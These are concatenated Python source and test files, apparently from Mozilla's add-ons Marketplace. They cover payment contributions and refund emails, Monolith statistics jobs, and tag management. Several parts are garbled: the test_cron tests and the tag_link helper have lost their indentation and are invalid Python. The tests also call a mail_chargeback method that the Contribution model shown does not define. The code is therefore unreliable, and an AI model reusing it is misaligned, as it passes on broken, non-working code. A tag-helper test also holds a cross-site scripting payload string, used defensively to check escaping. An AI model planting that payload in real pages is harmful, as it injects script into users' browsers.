            try:
                d = json.loads(value)
            except ValueError:
                d = None
        else:
            # phpserialize data
            try:
                if isinstance(value, unicode):
                    value = value.encode('utf8')
                d = php.unserialize(value, decode_strings=True)
            except ValueError:
                d = None
        # Anything that didn't decode to a dict collapses to None.
        if isinstance(d, dict):
            return d
        return None

    def get_db_prep_value(self, value, connection, prepared=False):
        if value is None or value == '':
            return value
        try:
            value = json.dumps(dict(value))
        except TypeError:
            value = None
        return value

    def value_to_string(self, obj):
        # NOTE(review): this stringifies the model instance itself, not the
        # field's value — serialization probably wants the field value;
        # confirm before relying on dumpdata output.
        return str(obj)
########NEW FILE########
__FILENAME__ = models
import datetime
from django.conf import settings
from django.db import models
from django.utils import translation
import tower
from babel import Locale, numbers
from jingo import env
from jinja2.filters import do_dictsort
from tower import ugettext as _
import amo
from amo.fields import DecimalCharField
from amo.helpers import absolutify, urlparams
from amo.utils import get_locale_from_lang, send_mail, send_mail_jinja
from .db import StatsDictField
class ContributionError(Exception):
    """Error raised while processing a contribution/payment."""

    def __init__(self, value):
        Exception.__init__(self)
        # Keep the offending value for callers and for __str__.
        self.value = value

    def __str__(self):
        return '%r' % (self.value,)
class Contribution(amo.models.ModelBase):
    """A payment/contribution record for an add-on, including Marketplace
    purchases, voluntary contributions, refunds and chargebacks (the
    latter two link back to the original charge via `related`)."""

    # TODO(addon): figure out what to do when we delete the add-on.
    addon = models.ForeignKey('addons.Addon')
    amount = DecimalCharField(max_digits=9, decimal_places=2,
                              nullify_invalid=True, null=True)
    currency = models.CharField(max_length=3,
                                choices=do_dictsort(amo.PAYPAL_CURRENCIES),
                                default=amo.CURRENCY_DEFAULT)
    source = models.CharField(max_length=255, null=True)
    source_locale = models.CharField(max_length=10, null=True)
    # This is the external id that you can communicate to the world.
    uuid = models.CharField(max_length=255, null=True, db_index=True)
    comment = models.CharField(max_length=255)
    # This is the internal transaction id between us and a provider,
    # for example paypal or solitude.
    transaction_id = models.CharField(max_length=255, null=True, db_index=True)
    paykey = models.CharField(max_length=255, null=True)
    post_data = StatsDictField(null=True)

    # Voluntary Contribution specific.
    charity = models.ForeignKey('addons.Charity', null=True)
    annoying = models.PositiveIntegerField(default=0,
                                           choices=amo.CONTRIB_CHOICES,)
    is_suggested = models.BooleanField(default=False)
    suggested_amount = DecimalCharField(max_digits=254, decimal_places=2,
                                        nullify_invalid=True, null=True)

    # Marketplace specific.
    # TODO(andym): figure out what to do when we delete the user.
    user = models.ForeignKey('users.UserProfile', blank=True, null=True)
    type = models.PositiveIntegerField(default=amo.CONTRIB_TYPE_DEFAULT,
                                       choices=do_dictsort(amo.CONTRIB_TYPES))
    price_tier = models.ForeignKey('prices.Price', blank=True, null=True,
                                   on_delete=models.PROTECT)
    # If this is a refund or a chargeback, which charge did it relate to.
    related = models.ForeignKey('self', blank=True, null=True,
                                on_delete=models.PROTECT)

    class Meta:
        db_table = 'stats_contributions'

    def __unicode__(self):
        return u'%s: %s' % (self.addon.name, self.amount)

    @property
    def date(self):
        """Creation timestamp truncated to a date (None when unsaved)."""
        try:
            return datetime.date(self.created.year,
                                 self.created.month, self.created.day)
        except AttributeError:
            # created may be None
            return None

    @property
    def contributor(self):
        """Payer's full name from the provider postback, if present."""
        try:
            return u'%s %s' % (self.post_data['first_name'],
                               self.post_data['last_name'])
        except (TypeError, KeyError):
            # post_data may be None or missing a key
            return None

    @property
    def email(self):
        """Payer's email from the provider postback, if present."""
        try:
            return self.post_data['payer_email']
        except (TypeError, KeyError):
            # post_data may be None or missing a key
            return None

    def _switch_locale(self):
        # Activate the locale the contribution was made in (falling back
        # to the add-on default) so outgoing mail gets translated.
        if self.source_locale:
            lang = self.source_locale
        else:
            lang = self.addon.default_locale
        tower.activate(lang)
        return Locale(translation.to_locale(lang))

    def _mail(self, template, subject, context):
        # Render and send a templated mail to the contributing user.
        template = env.get_template(template)
        body = template.render(context)
        send_mail(subject, body, settings.MARKETPLACE_EMAIL,
                  [self.user.email], fail_silently=True)

    def record_failed_refund(self, e, user):
        """Record a failed refund for this contribution and notify both
        the buyer and the app's support address."""
        self.enqueue_refund(amo.REFUND_FAILED, user,
                            rejection_reason=str(e))
        self._switch_locale()
        self._mail('users/support/emails/refund-failed.txt',
                   # L10n: the addon name.
                   _(u'%s refund failed' % self.addon.name),
                   {'name': self.addon.name})
        send_mail_jinja(
            'Refund failed', 'stats/email/refund-failed.txt',
            {'name': self.user.email,
             'error': str(e)},
            settings.MARKETPLACE_EMAIL,
            [str(self.addon.support_email)], fail_silently=True)

    def mail_approved(self):
        """The developer has approved a refund."""
        locale = self._switch_locale()
        amt = numbers.format_currency(abs(self.amount), self.currency,
                                      locale=locale)
        self._mail('users/support/emails/refund-approved.txt',
                   # L10n: the adddon name.
                   _(u'%s refund approved' % self.addon.name),
                   {'name': self.addon.name, 'amount': amt})

    def mail_declined(self):
        """The developer has declined a refund."""
        self._switch_locale()
        self._mail('users/support/emails/refund-declined.txt',
                   # L10n: the adddon name.
                   _(u'%s refund declined' % self.addon.name),
                   {'name': self.addon.name})

    def enqueue_refund(self, status, user, refund_reason=None,
                       rejection_reason=None):
        """Keep track of a contribution's refund status."""
        from mkt.prices.models import Refund
        refund, c = Refund.objects.safer_get_or_create(contribution=self,
                                                       user=user)
        refund.status = status

        # Determine which timestamps to update.
        timestamps = []
        if status in (amo.REFUND_PENDING, amo.REFUND_APPROVED_INSTANT,
                      amo.REFUND_FAILED):
            timestamps.append('requested')
        if status in (amo.REFUND_APPROVED, amo.REFUND_APPROVED_INSTANT):
            timestamps.append('approved')
        elif status == amo.REFUND_DECLINED:
            timestamps.append('declined')
        for ts in timestamps:
            setattr(refund, ts, datetime.datetime.now())

        if refund_reason:
            refund.refund_reason = refund_reason
        if rejection_reason:
            refund.rejection_reason = rejection_reason
        refund.save()
        return refund

    def get_amount_locale(self, locale=None):
        """Localise the amount paid into the current locale."""
        if not locale:
            lang = translation.get_language()
            locale = get_locale_from_lang(lang)
        return numbers.format_currency(self.amount or 0,
                                       self.currency or 'USD',
                                       locale=locale)

    def get_refund_url(self):
        return urlparams(self.addon.get_dev_url('issue_refund'),
                         transaction_id=self.transaction_id)

    def get_absolute_refund_url(self):
        return absolutify(self.get_refund_url())

    def get_refund_contribs(self):
        """Get related set of refund contributions."""
        return Contribution.objects.filter(
            related=self, type=amo.CONTRIB_REFUND).order_by('-modified')

    def is_refunded(self):
        """
        If related has been set, then this transaction has been refunded or
        charged back. This is a bit expensive, so refrain from using on listing
        pages.
        """
        return (Contribution.objects.filter(related=self,
                                            type__in=[amo.CONTRIB_REFUND,
                                                      amo.CONTRIB_CHARGEBACK])
                .exists())
########NEW FILE########
__FILENAME__ = tasks
import datetime
import json
import commonware.log
from celeryutils import task
import amo
from addons.models import AddonUser
from amo.decorators import write
from reviews.models import Review
from users.models import UserProfile
from mkt.constants.regions import REGIONS_CHOICES_SLUG
from mkt.monolith.models import MonolithRecord
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.task')
@task
@write
def update_monolith_stats(metric, date, **kw):
    """Run every job registered for `metric` on `date` and insert one
    MonolithRecord per non-zero count (dimensions merged into the value)."""
    log.info('Updating monolith statistics (%s) for (%s)' % (metric, date))
    jobs = _get_monolith_jobs(date)[metric]

    for job in jobs:
        try:
            # Only record if count is greater than zero.
            count = job['count']()
            if count:
                value = {'count': count}
                if 'dimensions' in job:
                    value.update(job['dimensions'])
                MonolithRecord.objects.create(recorded=date, key=metric,
                                              value=json.dumps(value))
                log.info('Monolith stats details: (%s) has (%s) for (%s). '
                         'Value: %s' % (metric, count, date, value))
            else:
                log.info('Monolith stat (%s) did not record due to falsy '
                         'value (%s) for (%s)' % (metric, count, date))
        except Exception as e:
            # One failing job must not abort the rest of this metric's jobs.
            log.critical('Update of monolith table failed: (%s): %s'
                         % ([metric, date], e))
def _get_monolith_jobs(date=None):
    """
    Return a dict of Monolith based statistics queries.

    The dict is of the form::

        {'<metric_name>': [{'count': <callable>, 'dimensions': <dimensions>}]}

    Where `dimensions` is an optional dict of dimensions we expect to filter on
    via Monolith.

    If a date is specified and applies to the job it will be used. Otherwise
    the date will default to today().
    """
    if not date:
        date = datetime.date.today()

    # If we have a datetime make it a date so H/M/S isn't used.
    if isinstance(date, datetime.datetime):
        date = date.date()

    # Jobs covering "on this date" filter on [date, next_date).
    next_date = date + datetime.timedelta(days=1)

    stats = {
        # Marketplace reviews.
        'apps_review_count_new': [{
            'count': Review.objects.filter(
                created__range=(date, next_date), editorreview=0,
                addon__type=amo.ADDON_WEBAPP).count,
        }],

        # New users
        'mmo_user_count_total': [{
            'count': UserProfile.objects.filter(
                created__lt=next_date,
                source=amo.LOGIN_SOURCE_MMO_BROWSERID).count,
        }],
        'mmo_user_count_new': [{
            'count': UserProfile.objects.filter(
                created__range=(date, next_date),
                source=amo.LOGIN_SOURCE_MMO_BROWSERID).count,
        }],

        # New developers.
        'mmo_developer_count_total': [{
            'count': AddonUser.objects.filter(
                user__created__lt=next_date,
                addon__type=amo.ADDON_WEBAPP).values('user').distinct().count,
        }],

        # App counts.
        'apps_count_new': [{
            'count': Webapp.objects.filter(
                created__range=(date, next_date)).count,
        }],
    }

    # Add various "Apps Added" for all the dimensions we need.
    apps = Webapp.objects.filter(created__range=(date, next_date))

    package_counts = []
    premium_counts = []

    # privileged==packaged for our consideration.
    package_types = amo.ADDON_WEBAPP_TYPES.copy()
    package_types.pop(amo.ADDON_WEBAPP_PRIVILEGED)

    for region_slug, region in REGIONS_CHOICES_SLUG:
        # Apps added by package type and region.
        for package_type in package_types.values():
            package_counts.append({
                'count': (apps
                          .filter(is_packaged=package_type == 'packaged')
                          .exclude(addonexcludedregion__region=region.id)
                          .count),
                'dimensions': {'region': region_slug,
                               'package_type': package_type},
            })

        # Apps added by premium type and region.
        for premium_type, pt_name in amo.ADDON_PREMIUM_API.items():
            premium_counts.append({
                'count': (apps
                          .filter(premium_type=premium_type)
                          .exclude(addonexcludedregion__region=region.id)
                          .count),
                'dimensions': {'region': region_slug,
                               'premium_type': pt_name},
            })

    stats.update({'apps_added_by_package_type': package_counts})
    stats.update({'apps_added_by_premium_type': premium_counts})

    # Add various "Apps Available" for all the dimensions we need.
    apps = Webapp.objects.filter(_current_version__reviewed__lt=next_date,
                                 status=amo.STATUS_PUBLIC,
                                 disabled_by_user=False)

    package_counts = []
    premium_counts = []

    for region_slug, region in REGIONS_CHOICES_SLUG:
        # Apps available by package type and region.
        for package_type in package_types.values():
            package_counts.append({
                'count': (apps
                          .filter(is_packaged=package_type == 'packaged')
                          .exclude(addonexcludedregion__region=region.id)
                          .count),
                'dimensions': {'region': region_slug,
                               'package_type': package_type},
            })

        # Apps available by premium type and region.
        for premium_type, pt_name in amo.ADDON_PREMIUM_API.items():
            premium_counts.append({
                'count': (apps
                          .filter(premium_type=premium_type)
                          .exclude(addonexcludedregion__region=region.id)
                          .count),
                'dimensions': {'region': region_slug,
                               'premium_type': pt_name},
            })

    stats.update({'apps_available_by_package_type': package_counts})
    stats.update({'apps_available_by_premium_type': premium_counts})

    return stats
########NEW FILE########
__FILENAME__ = test_cron
import datetime
import mock
from nose.tools import eq_
import amo.tests
from addons.models import Addon, AddonUser
from mkt.constants.regions import REGIONS_CHOICES_SLUG
from reviews.models import Review
from stats import tasks
from users.models import UserProfile
class TestMonolithStats(amo.tests.TestCase):
@mock.patch('stats.tasks.MonolithRecord')
def test_mmo_user_total_count_updates_monolith(self, record):
    # One browserid-sourced user should be recorded with count 1.
    UserProfile.objects.create(source=amo.LOGIN_SOURCE_MMO_BROWSERID)
    metric = 'mmo_user_count_total'

    tasks.update_monolith_stats(metric, datetime.date.today())
    self.assertTrue(record.objects.create.called)
    eq_(record.objects.create.call_args[1]['value'], '{"count": 1}')
def test_app_new(self):
    # A webapp created today shows up in the apps_count_new job.
    Addon.objects.create(type=amo.ADDON_WEBAPP)
    eq_(tasks._get_monolith_jobs()['apps_count_new'][0]['count'](), 1)
def test_app_added_counts(self):
today = datetime.date(2013, 1, 25)
app = Addon.objects.create(type=amo.ADDON_WEBAPP)
app.update(created=today)
package_type = 'packaged' if app.is_packaged else 'hosted'
premium_type = amo.ADDON_PREMIUM_API[app.premium_type]
# Add a region exclusion.
regions = dict(REGIONS_CHOICES_SLUG)
excluded_region = regions['br']
app.addonexcludedregion.create(region=excluded_region.id)
jobs = tasks._get_monolith_jobs(today)
# Check package type counts.
for job in jobs['apps_added_by_package_type']:
r = job['dimensions']['region']
p = job['dimensions']['package_type']
if r != excluded_region.slug and p == package_type:
expected_count = 1
else:
expected_count = 0
count = job['count']()
eq_(count, expected_count,
'Incorrect count for region %s, package type %s. '
'Got %d, expected %d.' % (r, p, count, expected_count))
# Check premium type counts.
for job in jobs['apps_added_by_premium_type']:
r = job['dimensions']['region']
p = job['dimensions']['premium_type']
if r != excluded_region.slug and p == premium_type:
expected_count = 1
else:
expected_count = 0
count = job['count']()
eq_(count, expected_count,
'Incorrect count for region %s, premium type %s. '
'Got %d, expected %d.' % (r, p, count, expected_count))
def test_app_avail_counts(self):
today = datetime.date(2013, 1, 25)
app = Addon.objects.create(type=amo.ADDON_WEBAPP,
status=amo.STATUS_PUBLIC)
# Create a couple more to test the counts.
Addon.objects.create(type=amo.ADDON_WEBAPP, status=amo.STATUS_PENDING)
Addon.objects.create(type=amo.ADDON_WEBAPP, status=amo.STATUS_PUBLIC,
disabled_by_user=True)
package_type = 'packaged' if app.is_packaged else 'hosted'
premium_type = amo.ADDON_PREMIUM_API[app.premium_type]
# Add a region exclusion.
regions = dict(REGIONS_CHOICES_SLUG)
excluded_region = regions['br']
app.addonexcludedregion.create(region=excluded_region.id)
jobs = tasks._get_monolith_jobs(today)
# Check package type counts.
for job in jobs['apps_available_by_package_type']:
r = job['dimensions']['region']
p = job['dimensions']['package_type']
if r != excluded_region.slug and p == package_type:
expected_count = 1
else:
expected_count = 0
count = job['count']()
eq_(count, expected_count,
'Incorrect count for region %s, package type %s. '
'Got %d, expected %d.' % (r, p, count, expected_count))
# Check premium type counts.
for job in jobs['apps_available_by_premium_type']:
r = job['dimensions']['region']
p = job['dimensions']['premium_type']
if r != excluded_region.slug and p == premium_type:
expected_count = 1
else:
expected_count = 0
count = job['count']()
eq_(count, expected_count,
'Incorrect count for region %s, premium type %s. '
'Got %d, expected %d.' % (r, p, count, expected_count))
def test_app_reviews(self):
addon = Addon.objects.create(type=amo.ADDON_WEBAPP)
user = UserProfile.objects.create(username='foo')
Review.objects.create(addon=addon, user=user)
eq_(tasks._get_monolith_jobs()['apps_review_count_new'][0]['count'](),
1)
def test_user_total(self):
day = datetime.date(2009, 1, 1)
p = UserProfile.objects.create(username='foo',
source=amo.LOGIN_SOURCE_MMO_BROWSERID)
p.update(created=day)
eq_(tasks._get_monolith_jobs(day)['mmo_user_count_total'][0]['count'](),
1)
eq_(tasks._get_monolith_jobs()['mmo_user_count_total'][0]['count'](),
1)
eq_(tasks._get_monolith_jobs()['mmo_user_count_new'][0]['count'](), 0)
def test_user_new(self):
UserProfile.objects.create(username='foo',
source=amo.LOGIN_SOURCE_MMO_BROWSERID)
eq_(tasks._get_monolith_jobs()['mmo_user_count_new'][0]['count'](), 1)
def test_dev_total(self):
p1 = UserProfile.objects.create(username='foo',
source=amo.LOGIN_SOURCE_MMO_BROWSERID)
p2 = UserProfile.objects.create(username='bar',
source=amo.LOGIN_SOURCE_MMO_BROWSERID)
a1 = amo.tests.addon_factory()
a2 = amo.tests.app_factory()
AddonUser.objects.create(addon=a1, user=p1)
AddonUser.objects.create(addon=a1, user=p2)
AddonUser.objects.create(addon=a2, user=p1)
eq_(tasks._get_monolith_jobs()['mmo_developer_count_total'][0]['count'](),
1)
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import json
from django.core import mail
from django.test.client import RequestFactory
import phpserialize as php
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from stats.models import Contribution
from stats.db import StatsDictField
from users.models import UserProfile
from zadmin.models import DownloadSource
import mkt.regions
from mkt.prices.models import Refund
class TestStatsDictField(amo.tests.TestCase):
    """StatsDictField.to_python must accept None, plain dicts, and both
    PHP-serialized and JSON-serialized strings (legacy rows used PHP)."""
    def test_to_python_none(self):
        eq_(StatsDictField().to_python(None), None)
    def test_to_python_dict(self):
        eq_(StatsDictField().to_python({'a': 1}), {'a': 1})
    def test_to_python_php(self):
        val = {'a': 1}
        eq_(StatsDictField().to_python(php.serialize(val)), val)
    def test_to_python_json(self):
        val = {'a': 1}
        eq_(StatsDictField().to_python(json.dumps(val)), val)
class TestEmail(amo.tests.TestCase):
    """Chargeback / refund notification emails sent from Contribution."""
    fixtures = ['base/users', 'base/addon_3615']
    def setUp(self):
        self.addon = Addon.objects.get(pk=3615)
        self.user = UserProfile.objects.get(pk=999)
    def make_contribution(self, amount, locale, type):
        # Helper: a Contribution for self.addon/self.user of the given type.
        return Contribution.objects.create(type=type, addon=self.addon,
                                           user=self.user, amount=amount,
                                           source_locale=locale)
    def chargeback_email(self, amount, locale):
        # Trigger the chargeback mail and return the single message sent.
        cont = self.make_contribution(amount, locale, amo.CONTRIB_CHARGEBACK)
        cont.mail_chargeback()
        eq_(len(mail.outbox), 1)
        return mail.outbox[0]
    def test_chargeback_email(self):
        email = self.chargeback_email('10', 'en-US')
        eq_(email.subject, u'%s payment reversal' % self.addon.name)
        assert str(self.addon.name) in email.body
    def test_chargeback_negative(self):
        # Amounts are rendered as absolute values regardless of sign.
        email = self.chargeback_email('-10', 'en-US')
        assert '$10.00' in email.body
    def test_chargeback_positive(self):
        email = self.chargeback_email('10', 'en-US')
        assert '$10.00' in email.body
    def test_chargeback_unicode(self):
        self.addon.name = u'Азәрбајҹан'
        self.addon.save()
        email = self.chargeback_email('-10', 'en-US')
        assert '$10.00' in email.body
    def test_chargeback_locale(self):
        # With a French source locale the amount is formatted per locale.
        self.addon.name = {'fr': u'België'}
        self.addon.locale = 'fr'
        self.addon.save()
        email = self.chargeback_email('-10', 'fr')
        assert u'België' in email.body
        assert u'10,00\xa0$US' in email.body
    def notification_email(self, amount, locale, method):
        # Helper: fire the named refund mail method and return the message.
        cont = self.make_contribution(amount, locale, amo.CONTRIB_REFUND)
        getattr(cont, method)()
        eq_(len(mail.outbox), 1)
        return mail.outbox[0]
    def test_accepted_email(self):
        email = self.notification_email('10', 'en-US', 'mail_approved')
        eq_(email.subject, u'%s refund approved' % self.addon.name)
        assert str(self.addon.name) in email.body
    def test_accepted_unicode(self):
        self.addon.name = u'Азәрбајҹан'
        self.addon.save()
        email = self.notification_email('10', 'en-US', 'mail_approved')
        assert '$10.00' in email.body
    def test_accepted_locale(self):
        self.addon.name = {'fr': u'België'}
        self.addon.locale = 'fr'
        self.addon.save()
        email = self.notification_email('-10', 'fr', 'mail_approved')
        assert u'België' in email.body
        assert u'10,00\xa0$US' in email.body
    def test_declined_email(self):
        email = self.notification_email('10', 'en-US', 'mail_declined')
        eq_(email.subject, u'%s refund declined' % self.addon.name)
    def test_declined_unicode(self):
        self.addon.name = u'Азәрбајҹан'
        self.addon.save()
        email = self.notification_email('10', 'en-US', 'mail_declined')
        eq_(email.subject, u'%s refund declined' % self.addon.name)
    def test_failed_email(self):
        # A failed refund records a Refund row and mails user and developer.
        cont = self.make_contribution('10', 'en-US', amo.CONTRIB_PURCHASE)
        msg = 'oh no'
        cont.record_failed_refund(msg, self.user)
        eq_(Refund.objects.count(), 1)
        rf = Refund.objects.get(contribution=cont)
        eq_(rf.status, amo.REFUND_FAILED)
        eq_(rf.rejection_reason, msg)
        eq_(len(mail.outbox), 2)
        usermail, devmail = mail.outbox
        eq_(usermail.to, [self.user.email])
        eq_(devmail.to, [self.addon.support_email])
        assert msg in devmail.body
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import Tag
class TagAdmin(admin.ModelAdmin):
    """Admin page for Tag: newest first, with inline blacklist editing."""
    list_display = ('tag_text', 'popularity', 'created', 'blacklisted')
    list_editable = ('blacklisted',)
    list_filter = ('blacklisted',)
    ordering = ('-created',)
    # '^' restricts the admin search to prefix matches on tag_text.
    search_fields = ('^tag_text',)
admin.site.register(Tag, TagAdmin)
########NEW FILE########
__FILENAME__ = helpers
from jingo import register, env
import jinja2
@register.inclusion_tag('tags/tag_list.html')
@jinja2.contextfunction
def tag_list(context, addon, tags=None):
    """Display list of tags, with delete buttons.

    :param context: the template context (copied into the tag's context).
    :param addon: the add-on whose tags are being shown.
    :param tags: iterable of tags to render; defaults to an empty list.
    """
    # Avoid the mutable-default-argument pitfall: each call gets its own
    # fresh list instead of one shared [] created at import time.
    if tags is None:
        tags = []
    c = dict(context.items())
    c.update({'addon': addon,
              'tags': tags})
    return c
def range_convert(value, old_min, old_max, new_min, new_max):
    """Map ``value`` from the range [old_min, old_max] onto
    [new_min, new_max], preserving its relative position.

    A degenerate source range (old_max == old_min) is treated as a span
    of 1 to avoid dividing by zero.
    """
    span_old = old_max - old_min
    if span_old == 0:
        span_old = 1
    span_new = new_max - new_min
    return new_min + int(((value - old_min) * span_new) / span_old)
@register.function
def tag_link(tag, min_count, max_count, min_level=1):
"""create the tag cloud link with the poper tagLevel class"""
factor = max(range_convert(tag.num_addons, 0, max_count, 1, 10),
min_level)
t = env.get_template('tags/tag_link.html').render({'factor': factor,
'tag': tag})
return jinja2.Markup(t)
########NEW FILE########
__FILENAME__ = clean_tags
from django.core.management.base import BaseCommand
from tags.models import Tag
from tags.tasks import clean_tag
class Command(BaseCommand):
    # https://bugzilla.mozilla.org/show_bug.cgi?id=612811
    help = 'Migration to clean up old tags per 612811'

    def handle(self, *args, **kw):
        """Queue a clean_tag celery task for every Tag, in pk order."""
        pks = list(Tag.objects.values_list('pk', flat=True).order_by('pk'))
        # Write through self.stdout (the Django management-command
        # convention) instead of a bare ``print`` statement, so the output
        # is capturable in tests and the code no longer uses py2-only
        # syntax.
        self.stdout.write(
            "Found: %s tags to clean and adding to celery.\n" % len(pks))
        for pk in pks:
            clean_tag.delay(pk)
########NEW FILE########
__FILENAME__ = models
from django.db import models
from django.core.urlresolvers import NoReverseMatch
import amo.models
from amo.urlresolvers import reverse
class TagManager(amo.models.ManagerBase):
    def not_blacklisted(self):
        """Get allowed tags only (i.e. exclude blacklisted tags)."""
        return self.filter(blacklisted=False)
class Tag(amo.models.ModelBase):
    """A user tag attachable to add-ons through the AddonTag join table."""
    tag_text = models.CharField(max_length=128)
    blacklisted = models.BooleanField(default=False)
    restricted = models.BooleanField(default=False)
    addons = models.ManyToManyField('addons.Addon', through='AddonTag',
                                    related_name='tags')
    # Denormalized count of addons using this tag, kept fresh by
    # update_stat() via the AddonTag post_save/post_delete signals below.
    num_addons = models.IntegerField(default=0)
    objects = TagManager()
    class Meta:
        db_table = 'tags'
        ordering = ('tag_text',)
    def __unicode__(self):
        return self.tag_text
    @property
    def popularity(self):
        # Alias used by the admin list display.
        return self.num_addons
    def can_reverse(self):
        """Return True if this tag's detail URL can be reversed (some tag
        texts, e.g. ones containing markup, fail URL pattern matching)."""
        try:
            self.get_url_path()
            return True
        except NoReverseMatch:
            return False
    def get_url_path(self):
        return reverse('tags.detail', args=[self.tag_text])
    def flush_urls(self):
        # Cache-busting URL globs for this tag.
        urls = ['*/tag/%s' % self.tag_text, ]
        return urls
    def save_tag(self, addon):
        """Attach this tag's text to ``addon``, creating the canonical Tag
        row if needed; logs the action and returns the canonical Tag."""
        tag, created = Tag.objects.get_or_create(tag_text=self.tag_text)
        AddonTag.objects.get_or_create(addon=addon, tag=tag)
        amo.log(amo.LOG.ADD_TAG, tag, addon)
        return tag
    def remove_tag(self, addon):
        """Detach this tag's text from ``addon`` and log the removal."""
        tag, created = Tag.objects.get_or_create(tag_text=self.tag_text)
        for addon_tag in AddonTag.objects.filter(addon=addon, tag=tag):
            addon_tag.delete()
        amo.log(amo.LOG.REMOVE_TAG, tag, addon)
    def update_stat(self):
        """Refresh num_addons; blacklisted tags keep their stored count."""
        if self.blacklisted:
            return
        self.num_addons = self.addons.count()
        self.save()
class AddonTag(amo.models.ModelBase):
    """Join table linking an Addon to a Tag."""
    addon = models.ForeignKey('addons.Addon', related_name='addon_tags')
    tag = models.ForeignKey(Tag, related_name='addon_tags')
    class Meta:
        # Legacy table name from when tags were stored per-user.
        db_table = 'users_tags_addons'
    def flush_urls(self):
        # Cache-busting URL globs for both sides of the relation.
        urls = ['*/addon/%d/' % self.addon_id,
                '*/tag/%s' % self.tag.tag_text, ]
        return urls
def update_tag_stat_signal(sender, instance, **kw):
    """post_save/post_delete handler on AddonTag: refresh the tag's
    denormalized num_addons asynchronously.

    Skipped for fixture loading (``raw``).  The Tag.DoesNotExist guard
    covers the case where the related tag is already gone (e.g. cascade
    delete) by the time we dereference ``instance.tag``.
    """
    # Imported here to avoid a circular import between models and tasks.
    from .tasks import update_tag_stat
    if not kw.get('raw'):
        try:
            update_tag_stat.delay(instance.tag)
        except Tag.DoesNotExist:
            pass
# Keep tag counts in sync on both creation and deletion of AddonTags.
models.signals.post_save.connect(update_tag_stat_signal, sender=AddonTag,
                                 dispatch_uid='update_tag_stat')
models.signals.post_delete.connect(update_tag_stat_signal, sender=AddonTag,
                                   dispatch_uid='delete_tag_stat')
########NEW FILE########
__FILENAME__ = tasks
from celeryutils import task
import commonware.log
from amo.utils import slugify
from tags.models import AddonTag, Tag
task_log = commonware.log.getLogger('z.task')
@task(rate_limit='1000/m')
def clean_tag(pk, **kw):
    """Normalize the text of the tag with primary key ``pk``.

    Slugifies the tag text; if the normalized text collides with other
    existing tags, their AddonTags are migrated onto this tag, the
    duplicates are deleted, and a blacklist flag on any duplicate is
    preserved.  Safe to re-run (idempotent once the text is clean).
    """
    task_log.info("[1@%s] Cleaning tag %s" % (clean_tag.rate_limit, pk))
    try:
        # It could be that a previous run of this has deleted our
        # tag, if so we just leave.
        tag = Tag.objects.no_cache().get(pk=pk)
    except Tag.DoesNotExist:
        return
    old = tag.tag_text
    new = slugify(old, spaces=True, lower=True)
    if old != new:
        # Find out if there's any existing tags with this tag.
        existing = (Tag.objects.no_cache().filter(tag_text=new)
                    .select_related()
                    .exclude(pk=tag.pk).order_by("pk"))
        blacklisted = tag.blacklisted
        if existing:
            # Before deleting them, see if any AddonTags need to
            # be moved over.
            for existing_tag in existing:
                for addon_tag in existing_tag.addon_tags.all():
                    if not (AddonTag.objects.no_cache()
                            .filter(addon=addon_tag.addon, tag=tag)
                            .exists()):
                        # If there are no tags for this addon, but there is
                        # for an existing and about to be deleted addon tag,
                        # move just one addon tag over.
                        addon_tag.update(tag=tag)
                # If there's a tag in all this that's blacklisted, keep that
                # around.
                if existing_tag.blacklisted:
                    blacklisted = True
            Tag.objects.filter(pk__in=[e.pk for e in existing]).delete()
        tag.update(tag_text=new, blacklisted=blacklisted)
@task(rate_limit='10/m')
def update_all_tag_stats(pks, **kw):
    """Recompute the denormalized addon count for a batch of tags."""
    task_log.info("[%s@%s] Calculating stats for tags starting with %s" %
                  (len(pks), update_all_tag_stats.rate_limit, pks[0]))
    for tag in Tag.objects.filter(pk__in=pks):
        tag.update_stat()
@task(rate_limit='1000/m')
def update_tag_stat(tag, **kw):
    """Recompute the denormalized addon count for a single Tag instance.

    NOTE(review): receives a model instance (not a pk), so the object is
    serialized into the task payload -- confirm that is intended.
    """
    task_log.info("[1@%s] Calculating stats for tag %s" %
                  (update_tag_stat.rate_limit, tag.pk))
    tag.update_stat()
########NEW FILE########
__FILENAME__ = test_helpers
from django import test
from jingo import env
from mock import Mock
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
from addons.models import Addon
from tags.models import AddonTag, Tag
from tags.helpers import tag_link
xss = "<script>alert('xss')</script>"
def render(s, context={}):
    """Taken from jingo.tests.utils, previously jingo.tests.test_helpers."""
    # Renders the template string ``s`` with ``context`` via the jingo env.
    # The mutable default is safe here since ``context`` is never mutated.
    t = env.from_string(s)
    return t.render(context)
class TestHelpers(test.TestCase):
    """Tests for the tags template helpers (tag_list, tag_link)."""
    fixtures = ('base/addon_3615', 'base/user_2519', 'base/user_4043307',
                'tags/tags')
    def test_tag_list(self):
        addon = Addon.objects.get(id=3615)
        request = Mock()
        request.user = addon.authors.all()[0]
        request.groups = ()
        tags = addon.tags.not_blacklisted()
        ctx = {
            'APP': amo.FIREFOX,
            'LANG': 'en-us',
            'request': request,
            'addon': addon,
            'tags': tags}
        # no tags, no list
        s = render('{{ tag_list(addon) }}', ctx)
        self.assertEqual(s.strip(), "")
        s = render('{{ tag_list(addon, tags=tags) }}', ctx)
        assert s, "Non-empty tags must return tag list."
        doc = pq(s)
        eq_(doc('li').length, len(tags))
    def test_helper(self):
        # A tag whose text cannot be reversed into a URL (here: markup)
        # must be rendered without a link.
        addon = Addon.objects.get(pk=3615)
        tag = addon.tags.all()[0]
        tag.tag_text = xss
        tag.num_addons = 1
        tag.save()
        doc = pq(tag_link(tag, 1, 1))
        assert not doc('a')
def create_tags(addon, author, number):
    """Create ``number`` distinct tags and attach them to ``addon``.

    NOTE(review): the ``AddonTag`` model in tags.models only defines
    ``addon`` and ``tag`` foreign keys, so the previous ``user=author``
    keyword would raise a TypeError on create.  ``author`` is retained in
    the signature for backward compatibility with existing callers.
    """
    for x in range(number):
        tag = Tag.objects.create(tag_text='tag %s' % x, blacklisted=False)
        AddonTag.objects.create(tag=tag, addon=addon)
########NEW FILE########
__FILENAME__ = test_models
from nose.tools import eq_
import amo.tests
from addons.models import Addon
from tags.models import AddonTag, Tag
from tags.tasks import clean_tag
class TestTagManager(amo.tests.TestCase):
    def test_not_blacklisted(self):
        """Make sure Tag Manager filters right for not blacklisted tags."""
        tag1 = Tag(tag_text='abc', blacklisted=False)
        tag1.save()
